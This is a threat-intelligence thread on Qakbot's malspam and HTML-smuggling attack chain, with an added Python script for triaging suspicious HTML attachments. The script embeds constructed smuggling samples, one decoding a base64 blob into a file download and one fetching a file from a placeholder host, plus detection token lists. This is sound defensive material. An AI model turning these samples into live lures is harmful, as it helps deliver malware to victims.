#Qakbot threat actors are on fire 🔥 recently. We observed a high volume of attacks both internally and through external sources. Here is a brief summary of their current attack chain. 🧵1/6
Qakbot's main initial access vector is still through malspam campaigns ✉️. They use email thread hijacking for their spam messages to increase the likelihood that the victim user will interact with the message. 🧵2/6
After a short excursion to OneNote files, both main active #Qakbot botnets have currently returned to using HTML smuggling to deliver the initial attack payload. This technique has already been seen in many campaigns last year. 🧵3/6
The obama botnet currently uses a fake OneDrive message to lure victims into opening the enclosed payload, which is embedded as a base64-encoded string. The BB botnet instead uses Latin-themed texts and contains a script that will download the payload from a remote server. 🧵4/6
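As an added example (not code from the thread or from Deutsche Telekom CERT), here is a small triage script for HTML attachments that distinguishes the two variants described above: a base64 blob decoded and handed to the browser as a download (obama) versus a script that fetches the payload from a remote host (BB). The HTML samples, the ZIP stub and the placeholder URL are constructed for the demonstration.

```python
import base64
import re

# Constructed samples standing in for the two lure variants the thread describes
# (not real Qakbot HTML). The "payload" is a bare ZIP local-file header plus
# zero padding, so nothing in these samples is executable.
ZIP_STUB = base64.b64encode(b"PK\x03\x04" + b"\x00" * 200).decode()
SAMPLE_EMBEDDED = f"""<html><body><p>Your OneDrive document is ready.</p><script>
var p = "{ZIP_STUB}";
var b = new Blob([Uint8Array.from(atob(p), c => c.charCodeAt(0))]);
var a = document.createElement("a"); a.href = URL.createObjectURL(b);
a.download = "Document.zip";</script></body></html>"""
SAMPLE_REMOTE = """<html><body><p>Lorem ipsum dolor sit amet.</p><script>
fetch("https://example.invalid/placeholder").then(r => r.blob()).then(b => {
var a = document.createElement("a"); a.href = URL.createObjectURL(b);
a.download = "Document.zip"; });</script></body></html>"""
SAMPLE_BENIGN = "<html><body><h1>Newsletter</h1><p>Nothing to see.</p></body></html>"

# Magic bytes of containers that smuggled droppers typically carry.
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"\x1f\x8b": "gzip", b"Rar!\x1a\x07": "rar"}
B64_RE = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")   # long base64-looking runs only
DROP_TOKENS = ("URL.createObjectURL", "msSaveOrOpenBlob", ".download")
DECODE_TOKENS = ("atob(", "new Blob(")
FETCH_TOKENS = ("fetch(", "XMLHttpRequest")

def identify(blob: bytes) -> str:
    """Classify a decoded blob by magic bytes; 'unknown' if nothing matches."""
    for magic, kind in MAGIC.items():
        if blob.startswith(magic):
            return kind
    return "unknown"

def analyze_html(html: str) -> dict:
    """Flag HTML that makes the browser save a file, either from an embedded
    base64 blob or from a script-driven remote download."""
    embedded = []
    for m in B64_RE.finditer(html):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        embedded.append({"offset": m.start(), "size": len(data), "kind": identify(data)})
    drop = [t for t in DROP_TOKENS if t in html]
    decode = [t for t in DECODE_TOKENS if t in html]
    fetch = [t for t in FETCH_TOKENS if t in html]
    verdict = "clean"
    if drop and decode and embedded:
        verdict = "smuggling-embedded"   # obama-style: payload inside the HTML
    elif drop and fetch:
        verdict = "smuggling-remote"     # BB-style: payload pulled from a server
    return {"verdict": verdict, "embedded": embedded, "tokens": drop + decode + fetch}
```

Running `analyze_html` over a mail gateway's quarantined HTML attachments gives a quick split between the two variants and surfaces the decoded container type for further analysis.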
In both cases, the next stage is a JavaScript file. If opened with wscript, it triggers download and execution of the #Qakbot malware ⚠️. System administrators should consider changing the default application for .js files (and similar scripts) to prevent such attacks. 🧵5/6
#Qakbot remains one of the most dangerous initial access brokers and is a key ransomware enabler. Deutsche Telekom CERT and CTI will keep monitoring 🔍 the evolution of Qakbot's TTPs. 🧵6/6